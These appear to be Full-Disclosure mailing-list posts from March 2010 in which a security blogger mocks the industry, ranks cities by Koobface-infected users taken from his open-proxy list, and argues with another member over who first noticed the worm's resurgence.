Today I was inspired by The Norton Top 10 Riskiest Online Cities Report (http://norton.newslinevine.com/Riskiest_Online_Cities_Press_Release.pdf) so I decided to do my own press release with my own data (in light of recent events). - The Hinky Dink Top 10 Koobface Infested Shitholes Report Reveals Where Web 2.0's Most PWN3D Users Live Columbus, Ohio – March 22, 2010 – Mr. Hinky Dink, a Big Time Security Professional™ today released an analysis of the spread of the Koobface worm. Based on an exhaustive study of his database of over two and a half million open Web proxies collected over two years, Hinky's findings demonstrate where the most vulnerable social networking users can be found. The following are ranked the Hinky Top Ten Social Networking Shitholes: 1.Saint Louis 2.Chicago 3.Kansas City 4.Houston 5.Birmingham 6.Dallas 7.Oklahoma City 8.Los Angeles 9.Brooklyn 10.Columbus The complete report is available at http://www.mrhinkydink.com/Koobface%20Shithole%20Report%2003-22-2010.pdf - http://twitter.com/mrhinkydink http://mrhinkydink.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Setting the record straight on The Return of Koobface
Today I ran across this article... http://www.nst.com.my/Current_News/NST/articles/20100320160620/Article/index_html ... in which it is noted that Kaspersky Labs recently discovered the resurgence of the malicious programme (Koobface) and sounded the alarm. Gentlemen, I beg to differ. I first mentioned the resurgence of Koobface on February 23rd, 2010 here... http://proxyobsession.net/?p=827 I admit I did not sound the alarm. I simply lol'd because Koobface is one sign of the EPIC FAIL of the security industry. Just ask Dancho Danchev. He's made quite a name for himself by doing absolutely nothing worthwhile about Koobface except raising his won blood pressure spewing vitriol about The Koobface Gang (sorry, Danny, but I'm not part of the gang. I'm just another BlogSpot loser). For those wondering, I am not a hacker. I am a Big Time Security Professional (you may remember me if you Google Websense Policy Bypass - unfortuantely those bastards at Warner Brothers killed the soundtrack to my YouTube video). But I am at heart a skeptic, disappointed at what the security industry has become. I created my Proxy List (http://www.mrhinkydink.com/proxies.htm) two years ago as a tool for an as yet unpublished paper on open SOCKS proxies in the wild. It has had the unintended side effect of tracking the spread of Koobface, since Kooberz proxies exclusively (until this month) appear on TCP port 8085. And it has tracked it quite well. I'd like to take this opportunity to say Hello (no, not GREETZ) to all the Cameroonian Puppy Scammers (papa Dollars, STARVO, Dabbleed, et. al.) who abuse my proxy list. Enough is enough. Get a real job, fellas. http://proxyobession.net http://mrhinkydink.blogspot.com http://twitter.com/mrhinkydink : (Follow me! I have no friends!) : ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Setting the record straight on The Return ofKoobface
Absolutely you are correct, but if you check the blog there are further references up to last Friday. It was a tremendous, jaw-dropping flood of Kooberz proxies the last two weeks. And it's still coming. The point is us Little Guys are paying attention, too. And sometimes we catch this shit before the Big Boys like Dancho and Kaspersky wake up and smell the coffee. Since February I've been wondering Why The Hell I hadn't heard anything in the ITsec press on this new resurgence. Did they hold back so Dancho could publish his Ten Things You Didn't Know About The Koobface Gang article? Or so Microsoft could gloat over taking down the Wimpy Waledac botnet? Is the Good News always published before the Bad News in the security industry press release cycle? The fact remains, Koobface marches on and the security industry can't stop it. Period. I will be among the first to jump up and down and yell RA! when someone takes it down, but it ain't going to happen soon. All I can do is sit back and watch while the Big Boys get their headlines. BTW, I don't consider myself bitter. I'm what you might call tangy. Thanks for your support, Hinky - Original Message - From: J Roger To: full-disclosure@lists.grok.org.uk Sent: Saturday, March 20, 2010 3:28 PM Subject: Re: [Full-disclosure] Setting the record straight on The Return ofKoobface This reads as waaa i noticed this first and didn't think much of it but now that someone else is making a big deal, i want my credit. Maybe you reported on it first on your blog, with a single sentence that wasn't even the primary focus of the post. Regardless if an up rise in koobface is significantly news worthy or not, you apparently failed to draw enough attention (or the right attention) to it at the time. In other words, maybe you did it first, but someone else did it better. What's more valuable to an enterprise, someone that quickly writes a risk assessment that's so sloppy the management with authority to act on the findings don't even bother to read it, or someone that takes the time to write a report on the same findings that actually speaks to the business and be able to make positive changes happen. You talk about being bitter towards the security industry (which IS understandable) but maybe it's time to reflect back a little on yourself. Maybe it's not ALL the industries fault. Maybe the sources of your bitterness have a little something to do with your inability to make enough of the right things happen. Sure you're a Big Time Security Professional, but maybe your blog wasn't enough to get the word out. Maybe you felt it wasn't even worth getting the word out or sounding any alarms. If that's the case though, don't go back now and try to take credit. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/